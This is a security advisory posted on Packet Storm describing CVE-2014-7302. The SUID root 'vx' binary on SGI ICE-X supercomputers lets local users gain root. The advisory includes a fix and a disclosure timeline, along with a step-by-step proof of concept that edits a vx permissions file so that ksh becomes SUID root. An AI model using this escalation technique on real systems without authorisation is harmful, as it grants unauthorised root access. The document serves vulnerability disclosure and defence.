exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SGI Tempo vx Setuid Privilege Escalation

SGI Tempo vx Setuid Privilege Escalation
Posted Dec 10, 2014
Authored by Luke Jennings, John Fitzpatrick, MWR Labs

/opt/sgi/sgimc/bin/vx, a setuid binary on SGI Tempo systems, allows for privilege escalation.

tags | exploit
advisories | CVE-2014-7302
SHA-256 | c32b2f12effe553e70e04d4889e25819691bd3ba3e5cc606cab0fa53442de067

SGI Tempo vx Setuid Privilege Escalation

Change Mirror Download
[SGI SUID Root Privilege Escalation]

Software: SGI Tempo (SGI ICE-X Supercomputers)
Affected Versions: Unknown
CVE Reference: CVE-2014-7302
Author: Luke Jennings, John Fitzpatrick, MWR Labs
Severity: Medium Risk
Vendor: Silicon Graphics International Corp (SGI)
Vendor Response: Uncooperative


[Description]

A vulnerability exists which allows low privileged local users to escalate their privileges to root.


[Impact]

Successful exploitation provides full root access to the affected system.


[Cause]

An insecure SUID root binary (/opt/sgi/sgimc/bin/vx).


[Solution]

If removing the vx binary is not an option this issue can be resolved by altering the file permissions:

# chmod 755 /opt/sgi/sgimc/bin/vx


[Technical Details]

A SUID root binary, believed to be part of the SGI Management Center, exists on SGI ICE-X supercomputers and is insecurely configured allowing for low privileged users to escalate their privileges. This binary is shown below:

$ ls -la /opt/sgi/sgimc/bin/vx
-rwsr-sr-x 1 root root 19248 2013-10-04 15:00 /opt/sgi/sgimc/bin/vx

MWR have only observed the vx binary on the admin nodes of ICE-X systems which are not typically accessible by non administrative users. If present on other nodes within the environment this issue should be considered a higher risk.

The output below shows the usage options available to users from the vx binary:

user@sgi:~/test> ./vx
Usage: vx -s[:<scanlist>] [-i:<ignorelist>] [<entries>]
vx -x [<entries>]

Options:
-s Scan the current directory or files listed in the specified file.
-i Ignore the directories listed in the specified file.
-x Extract files into the current directory.

NOTE: This program must be run directly or effectively as root.

The "vx" binary provides a means to apply file permissions to all files within a directory allowing for file permissions to be preserved across nodes in an efficient fashion. However, the SUID permissions set on this binary mean that any user can execute it in a manner which allows the user to alter the permissions of any file, regardless of ownership, and even to arbitrarily change file permissions. It is therefore possible to utilise the vx binary to set SUID root permissions on arbitrary files from a low privileged user account and thus escalate privileges.


[Proof of Concept]

This proof of concept demonstrates how the insecure permissions on this file can be exploited in order to create a SUID root executable. The example will use the Korn shell (ksh) for simplicity, but could easily be refactored for other purposes.

For the purpose of this example the contents of the current working directory are:

$ ls –la
drwxr-xr-x 3 j0hn users 4096 2014-09-01 14:42 .
drwxr-xr-x 13 j0hn users 4096 2014-09-01 14:42 ..
-rwxr-xr-x 1 j0hn users 38312 2014-09-01 14:30 ksh
-rwsr-sr-x 1 root root 19248 2014-08-19 19:41 vx

Run the following command in order to scan the current directory and create a file named "mwrtestx" that contains information on the file permissions of all files within your current working directory:

$ vx -s mwrtestx

The file "mwrtestx" will be created with the following content:

ksh^@f3wx92v53X3q3gB46FkQOX1^@5fat040116FkQOX1
vx^@f3S052Tt006bPnJX1^@5Wat040116ZtQOX1

The file mwrtestx contains the file name, file permissions as well as ownership details. Therefore if the filename "vx" within this file is altered to read "ksh" the file contents now specify that the "ksh" binary be set the SUID root permissions currently applied to the "vx" binary:

ksh^@f3S052Tt006bPnJX1^@5Wat040116ZtQOX1

Executing the "vx" binary with the "mwrtestx" file results in the file permissions within the "mwrtestx" file being applied, in this case resulting in ksh being altered and made SUID root:

$ vx -x mwrtestx
$ ls –la
drwxr-xr-x 3 j0hn users 4096 2014-09-01 14:45 .
drwxr-xr-x 13 j0hn users 4096 2014-09-01 14:45 ..
-rwsr-sr-x 1 root root 38312 2014-08-19 19:41 ksh
-rwsr-sr-x 1 root root 19248 2014-08-19 19:41 vx

To confirm that this has worked effectively ksh should be run:

$ ./ksh
# id
uid=200107(j0hn) gid=16100(users) euid=0(root) egid=0(root) groups=16100(users)


[Detailed Timeline]

SGI have chosen not to co-operate with MWR in the co-ordinated disclosure of this and other SGI related security issues. MWR are therefore unable to provide specific version information and other details. Whilst every effort has been made to ensure the accuracy and usefulness of this advisory it is recommend that SGI are contacted directly if further information is required.

2014-05-23: Contact with SGI attempted
2014-07-23: Contact with SGI re-attempted
2014-11-20: Contact with SGI re-attempted
2014-12-02: Advisory published

https://labs.mwrinfosecurity.com/advisories/2014/12/02/sgi-suid-root-privilege-escalation/
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close